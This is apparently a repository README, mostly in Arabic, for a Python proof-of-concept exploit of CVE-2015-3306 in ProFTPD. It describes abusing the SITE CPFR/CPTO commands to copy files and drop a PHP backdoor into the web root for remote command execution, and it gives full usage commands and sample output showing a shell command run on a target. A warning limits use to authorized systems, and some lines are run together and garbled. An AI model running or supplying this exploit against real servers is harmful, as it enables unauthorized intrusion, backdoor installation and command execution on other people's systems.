
استغلال PoC بلغة بايثون لـ CVE-2015-3306 لثغرة تجاوز الدليل في ProFTPD. ينسخ الملفات ويسقط بابًا خلفيًا بلغة PHP في الجذر الرئيسي للموقع (webroot) لتنفيذ الأوامر عن بُعد عبر أوامر FTP: SITE CPFR/CPTO.
يحتوي هذا المستودع على برنامج استغلال Python برهان المفهوم (PoC) لـ CVE-2015-3306
⚠️ تحذير: استخدم هذا فقط ضد أنظمة تمتلكها أو لديك إذن صريح لاختبارها. الاستغلال غير المصرح به غير قانوني.
Mohamed EL-KHAROUATI
CVE-2015-3306 هي ثغرة اجتياز الدليل في ProFTPD الإصدار 1.3.5b والإصدارات الأقدم. يتيح هذا الاستغلال نسخ الملفات التعسفية وإسقاط باب خلفي PHP في جذر الويب. يمكن للباب الخلفي تنفيذ أوامر شل تعسفية.
SITE CPFR/CPTO.backdoor.php) في جذر الويب المحدد.--rcommand.requests (pip install requests)# Run the exploit
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>
# Example:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami
# Expected Output:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip>
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done